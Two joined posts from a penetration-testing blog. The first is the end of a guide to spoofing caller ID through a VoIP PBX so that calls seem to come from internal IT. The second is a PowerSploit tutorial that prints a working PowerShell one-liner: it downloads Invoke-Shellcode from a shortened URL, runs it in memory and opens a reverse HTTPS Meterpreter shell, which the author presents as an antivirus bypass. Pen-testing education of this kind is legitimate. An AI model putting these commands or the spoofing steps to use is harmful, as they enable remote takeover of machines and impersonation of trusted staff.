Once logged into the Administrative portal, we will click on the ‘DID‘ tab which will bring up many other subtabs. We are interested in the ‘Sub Accounts’ subtab. This is the section that we will use to create a list of softphones that are authorized to use out PBX server. The software essentially acts as a client and sends all of the relevant information to the PBX server.

If you look closely there is a section to assign the caller ID for each phone that we configure. By default the caller ID is left blank and will show up as ‘unavailable’ when you make a phone call.

Once we’ve saved our configuration, lets test out what number gets displayed on the caller ID when we make our call (don’t worry, softphone configuration coming next).

Of course we always have the option of blocking out number with a little help from *67. An example of what that type of phone call looks like can be seen below:

Now that we have our spoofed phone number in place, save the settings and your ready to make a test phone call.

Oh my! would you look at that. Just look at it, we’ve successfully spoofed the phone number to make it look like we’re coming from Internal IT.

Now that we know how to configure the PBX server properly, lets move onto the softphone configuration to finish the entire process. We are not going to go into a ton of detail on how to configure the softphone software because Vitelity has a section full of tutorials for different softphone software.

I personally am using the software X-lite on my MAC operating system to sync up with the PBX server. Once the software is installed, you’ll need to configure an account just like you are hooking up an Outlook client for the first time. Here is what my configuration currently looks like:

Now our softphone client is all configured to use the PBX server. We should be all set to start testing it out by making some phone calls. Hope this has been informative, and good look pwning all the sauce on your next phone call gig!

The post Pwn all the Sauce with Caller ID Spoofing appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.

Sometimes you just want a shell. You don’t want to worry about compiling a binary, testing it against antivirus, figuring out how to upload it to the box and finally execute it. Maybe you are giving a demo of an awesome new Meterpreter post-exploitation module. Maybe you have less than a minute of physical access to a Windows kiosk machine and need a quick win. There are plenty of scenarios that end in a penetration tester gaining GUI access to a target machine through guessed or found RDP, ESX or VNC credentials. In those situations, the easiest way to get a Meterpreter shell without worrying about AV is with PowerSploit.

PowerSploit  is a collection of security-related modules and functions written in PowerShell. PowerSploit is already in both BackTrack and Kali, and its code is utilized by other awesome tools like SET  so you may already be using it!  Many of the scripts in the project are extremely useful in post-exploitation in Windows environments.  The project was started by Matt Graeber who is the author of the function we will use in this tutorial: Invoke-Shellcode.

In order for this to work, the target machine must have PowerShell installed and internet access. The first step is for us to set up our handler on our attacker box. This is something we will likely do often, so let’s automated it with a really simple Python script:

To start the multi/handler and configure it, we just run the script:

python StartListener.py 192.168.0.15 443

Now that our handler is ready, we can move on to executing our shell.  The first thing I did to make the next step easier to type is shorten the github link to Invoke-Shellcode with bitly:

Next, we need to run two commands in a PowerShell prompt to get our Meterpreter shell. The first command will create a .Net WebClient Object to download the function and pass it to Invoke-Expression to put it into memory:

IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’)

Now we just need to make a call to the Invoke-Shellcode function with the relevant parameters from the listener:

Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.0.15 –Lport 443 –Force

We can actually combine these commands to run a single command to execute our shell:

IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/14bZZ0c’); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 172.0.1.200 –Lport 443 –Force

Once we get the prompt back, we can safely close PowerShell because the ultra-useful Smart_Migrate Meterpreter script has safely landed us in a new process:

That is the easiest and most convenient AV-bypass I have ever seen!  Just open PowerShell and type a command.  Hopefully this post has shown you one way PowerSploit can make your life as a pen-tester easier.  You can find more ways at my  blog and by following me on twitter.  Also, join me at Derbycon when I will talk about the Pass-the-Hash attack and some simple mitigations with Skip Duckwall and how to use PowerSploit and Windows tools to accomplish post-exploitation tasks without uploading binaries with Matt Graeber.  I hope to see you all there!

-Chris

The post PowerSploit: The Easiest Shell You’ll Ever Get appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.